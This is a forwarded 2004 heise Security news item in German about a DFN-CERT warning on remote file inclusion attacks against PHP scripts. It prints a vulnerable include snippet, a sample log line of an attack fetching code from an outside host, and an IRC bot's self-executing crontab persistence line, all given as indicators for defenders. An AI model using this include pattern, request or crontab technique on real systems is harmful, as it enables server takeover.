Diese Meldung aus dem heise Security-Newsticker wurde Ihnen von
"[EMAIL PROTECTED]" gesandt. Wir weisen darauf hin, dass die Absenderangabe
nicht verifiziert ist. Sollten Sie Zweifel an der Authentizit�t des
Absenders haben, ignorieren Sie diese E-Mail bitte.
------------------------------------------------------------------------
05.10.2004 16:40
DFN-CERT warnt vor Angriffen auf Webserver mit unsicheren PHP-Skripten
Das DFN-CERT[1] und weitere deutsche CERTs (Computer Emergency Response
Teams) registrieren nach eigenen Angaben zurzeit massive Angriffe auf
Webserver mit unsicheren PHP-Skripten. In diese Skripte l�sst sich
weiterer Skript-Code einschleusen, der beispielsweise von einem anderem
Webserver nachgeladen und ausgef�hrt wird. Laut Meldung finden sich auf
bereits kompromittierten Systemen IRC-Bots, �ber die der Rechner
fernsteuerbar ist und f�r weitere Angriffe missbraucht werden kann.
Betroffen sind Systeme, bei denen in der php.ini die Option
allow_url_fopen = on[2] gesetzt ist und sich ein Skript aufrufen l�sst,
das dynamisch Code nachl�dt, beispielsweise so:
if (!isset($realm))
{
include "home.template";
}
else
{
include $realm ;
}
Anstelle des Pfades zu einer lokalen Datei ist es so m�glich, eine URL
zu einer Datei auf einem Webserver anzugeben. Der include-Befehl l�dt
das Skript von dort aus nach und bindet ihn ein. Liegt der Exploit-Code
bereit und ist ein verwundbares Skript gefunden, kann ein Angreifer
�ber einen einzigen HTTP-Get-Request die Attacke starten.
Das DFN-CERT r�t, derart konfigurierte Systeme nach Einbruchsspuren zu
untersuchen. Sollte in den Logdateien des eigenen Webservers Eintr�ge
wie
[28/Sep/2004:18:03:07 +0200] "GET
/pfad/zu/einem/script.php?
variablenname=http://192.168.1.2:4213/
HTTP/1.0" 200 15183 "-" "Wget/1.8.1"
oder �hnliche vorhanden sein, ist das System eventuell bereits
kompromittiert. Der IRC-Bot soll sich anhand eines Eintrages in der
Crontab erkennen lassen:
# "\177\105\114\10 [...] \000\37777777777" >
/tmp/tblihjauk ; chmod \700 /tmp/tblihjauk ;
/tmp/tblihjauk x ; rm -f /tmp/tblihjauk34
* * * * /bin/echo `crontab -l|grep '.\{666\}'
|sed 's/^./echo -e -n/'`|sh
Nach ersten Erkenntnissen wurden bislang nur Linux-Systeme
kompromittiert, allerdings ist die L�cke prinzipiell auch unter anderen
Betriebssystemen ausnutzbar.
Siehe dazu auch:
Warnung[3] vom DFN-CERT
Hardened PHP -- Sicheres PHP[4] Projekt von Stefan Esser
(dab[5]/c't)
URL dieses Artikels:
http://www.heise.de/security/news/meldung/51838
Links in diesem Artikel:
[1] https://www.dfn-cert.de/
[2] http://php3.de/manual/de/ref.filesystem.php
[3] http://cert.uni-stuttgart.de/archive/win-sec-ssc/2004/10/msg00015.html
[4] http://www.hardened-php.net/
[5] mailto:[EMAIL PROTECTED]
------------------------------------------------------------------------
Copyright 2004 Heise Zeitschriften Verlag
------------------------------------------------------------------------
FreeXP Entwickler-Mailingliste
[EMAIL PROTECTED]
http://www.freexp.de/cgi-bin/mailman/listinfo/dev-list
